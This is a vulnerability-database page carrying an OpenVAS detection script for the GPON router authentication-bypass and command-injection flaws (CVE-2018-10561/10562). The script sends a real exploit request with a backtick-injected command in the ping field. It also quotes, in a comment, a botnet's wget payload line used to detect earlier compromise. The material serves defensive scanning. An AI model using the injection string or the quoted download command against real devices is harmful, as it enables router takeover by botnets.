Lucene search
+L

GPON Routers Multiple Vulnerabilities

🗓️ 03 May 2018 00:00:00Reported by Copyright (C) 2018 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 135 Views

GPON Routers Multiple Vulnerabilities. Prone to authentication bypass and code execution, exploited by multiple botnets in 2018. Allows attackers to gain complete control. Contact vendor for fix

Related
Refs
Code
# SPDX-FileCopyrightText: 2018 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if( description )
{
  script_oid("1.3.6.1.4.1.25623.1.0.113170");
  script_version("2025-01-24T05:37:33+0000");
  script_tag(name:"last_modification", value:"2025-01-24 05:37:33 +0000 (Fri, 24 Jan 2025)");
  script_tag(name:"creation_date", value:"2018-05-03 16:26:55 +0200 (Thu, 03 May 2018)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2025-01-23 17:23:16 +0000 (Thu, 23 Jan 2025)");

  script_tag(name:"qod_type", value:"exploit");

  script_tag(name:"solution_type", value:"VendorFix");

  script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
  script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
  script_cve_id("CVE-2018-10561", "CVE-2018-10562");

  script_name("GPON Routers Multiple Vulnerabilities");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2018 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_gpon_home_router_detect.nasl");
  script_mandatory_keys("gpon/home_router/detected");

  script_tag(name:"summary", value:"GPON Home Routers are prone to multiple vulnerabilities.

  Those vulnerabilities where known to be exploited by the Mettle, Muhstik, Mirai, Hajime, and Satori Botnets in 2018.");

  script_tag(name:"vuldetect", value:"The script tries to exploit both vulnerabilities and execute and 'id' command
  on the target and checks if it was successful.");

  script_tag(name:"insight", value:"There exist two vulnerabilities:

  - Appending '?images/' to the URL when accessing the router's web interface will bypass authentication

  - The 'ping' command of the router allows for code execution.");

  script_tag(name:"impact", value:"Successful exploitation would allow an attacker to gain complete control over
  the target.");

  script_tag(name:"affected", value:"All GPON Home Routers are possibly affected.");

  script_tag(name:"solution", value:"Contact the vendor to obtain a solution.");

  script_xref(name:"URL", value:"https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/");

  exit(0);
}

CPE = "cpe:/o:gpon:home_router_firmware";

include( "host_details.inc" );
include( "http_func.inc" );
include( "http_keepalive.inc" );
include( "misc_func.inc" );

if( ! port = get_app_port( cpe: CPE, service: "www" ) ) exit( 0 );
if( ! get_app_location( cpe: CPE, port: port, nofork: TRUE ) ) exit(0);

# Just execute a command that certainly doesn't exist
# This allows for a safe check of command execution
non_command = rand_str( length: 12, charset: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" );

# Older versions of GPON Home Routers use a direct html page link
exploit_urls = make_list( '/GponForm/diag_Form?images/', '/menu.html?images/' );
exploit_data = 'XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\\`' + non_command + '\\`;' + non_command + '&ipv=0"';
result_url = '/diag.html?images/';

foreach url ( exploit_urls ) {
  req = http_post( port: port, item: url, data: exploit_data );
  # response is unimportant at this point, check for success happens on a different page
  http_keepalive_send_recv( port: port, data: req );
}

# Exploit needs a few seconds to take form
sleep( 5 );
req = http_get( port: port, item: result_url );
res = http_keepalive_send_recv( port: port, data: req );
if( ! res || res !~ "^HTTP/1\.[01] 200" )
  exit( 99 );

# var diag_result = "BusyBox... means ping command could be overwritten, but shell output could not be retrieved
#
# var diag_host = "`busybox wget http://xxx/bins/hotaru.arm -O /tmp/gaf means the box has already been compromised
if( string('sh: ', non_command, ': not found' ) >< res || 'diag_result = "BusyBox v' >< res ) {
  report = http_report_vuln_url(  port: port, url: result_url  );
  VULN = TRUE;
}

if( expl = egrep( string:res, pattern:'var diag_host = "`' ) ) {
  report  = http_report_vuln_url(  port: port, url: result_url  );
  report += '\n\nNOTE: The device has already been exploited by an attacker with the following command: ' + expl;
  VULN = TRUE;
}

if( VULN ) {
  security_message( data: report, port: port );
  exit( 0 );
}

exit( 99 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jan 2025 00:00Current
10High risk
Vulners AI Score10
CVSS 27.5
CVSS 3.19.8
EPSS0.99944
SSVC
135